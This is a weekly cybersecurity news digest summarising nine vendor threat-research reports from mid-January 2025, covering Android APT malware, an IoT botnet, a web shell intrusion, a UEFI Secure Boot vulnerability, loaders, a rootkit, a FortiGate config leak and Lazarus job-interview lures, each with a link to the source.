Cybersecurity Wiretap #39: From Android APT Operations to UEFI Exploits with a Focus on Multi-Platform Attacks (week of 01/13/2025)

Welcome to the weekly digest about the Cybersecurity & Threats in the wild. Below you will find a very subjective summary of Cybersecurity events for the prior week.

1.ANDROID MALWARE IN DONOT APT OPERATIONS by @CyfirmaR

  • Indian APT that serves Indian national interests
  • designed for intelligence gathering against internal threats
  • uses an innocent customer engagement platform for malicious purposes

https://www.cyfirma.com/research/android-malware-in-donot-apt-operations/

2.IoT Botnet Linked to Large-scale DDoS Attacks Since the End of 2024 by @TrendMicro

  • since end of 2024 large-scale DDoS attacks targeting companies in Japan, issued from the command-and-control (C&C) servers of an IoT botnet that has been attacking various countries globally
  • botnet comprises malware variants derived from Mirai & Bashlite and infects IoT devices by exploiting vulns and weak creds
  • commands include those that can incorporate various DDoS attack methods, update malware, and enable proxy services
  • primary devices used in the botnet were wireless routers and IP cameras from well-known brands

https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html

3.Investigating A Web Shell Intrusion With Trend Micro™ Managed XDR by @TrendMicro

  • endpoint sensors detected Internet Information Services IIS worker (w3wp.exe) executing suspicious activity
  • attacker was able to upload web shell to IIS worker, which, at the time of the attack, was unrestricted
  • attacker utilized encoded PowerShell command to create reverse TCP shell that connected to IP address for command-and-control

https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro–managed-xd.html

4. Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344 by @ESETresearch

  • vulnerability allows execution of untrusted code during system boot, enabling deployment of malicious UEFI bootkits
  • all UEFI systems with Microsoft third-party UEFI signing enabled are affected
  • issue was fixed by affected vendors and old, vulnerable binaries were revoked by Microsoft on Jan 14th, 2025

https://www.welivesecurity.com/en/eset-research/under-cloak-uefi-secure-boot-introducing-cve-2024-7344/

5. One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks by #PaloAlto’s #Unit42

  • Using network crawler leveraging relationships among domains, discovered network artifacts around known indicators and trained agraph neural network (GNN) to detect additional malicious domains

https://unit42.paloaltonetworks.com/graph-neural-networks

6. MintsLoader: StealC and BOINC Delivery by @esthreat

  • ongoing campaign involving MintsLoader odelivering second stage payloads like Stealc and the Berkeley Open Infrastructure for Network Computing (BOINC) client
  • PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file
  • features a Domain Generation Algorithm (DGA) with a seed value based on the addition of the current day of the month and a constant, combined with anti-VM techniques to evade sandboxes and malware researchers

https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery

7.Deep Dive Into a Linux Rootkit Malware by #FORTIGUARD LABS

  • follow-up analysis to how remote attackers exploited multiple vulnerabilities in an appliance to gain control of a customer’s system

https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware

8. Massive FortiGate Config Leak: Assessing the Impact by @censysio

  • new hacker group leaked full Fortinet FortiGate firewall configs, including plaintext creds, for over 15k devices from compromise dating back to 2022
  • As of January 17, of 15,4k distinct compromised hosts, over half are still online and reachable in scans, and 32.88% are still exposing their FortiGate web login interfaces

https://censys.com/fortigate-config-leak-impact

9. Lazarus APT: Techniques for Hunting Contagious Interview by @ValidinLLC

  • using the ClickFix social engineering technique to trick job seekers into copying and pasting malicious code onto their devices during fake video job interviews (“Contagious Interview”)
  • hows how to expand and pivot from threat intelligence using Validin to detect likely-related infrastructure and mitigate this threat

https://www.validin.com/blog/inoculating_contagious_interview_with_validin

Thank you for reading.

Please add interesting items you came across during the week in the comments below.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.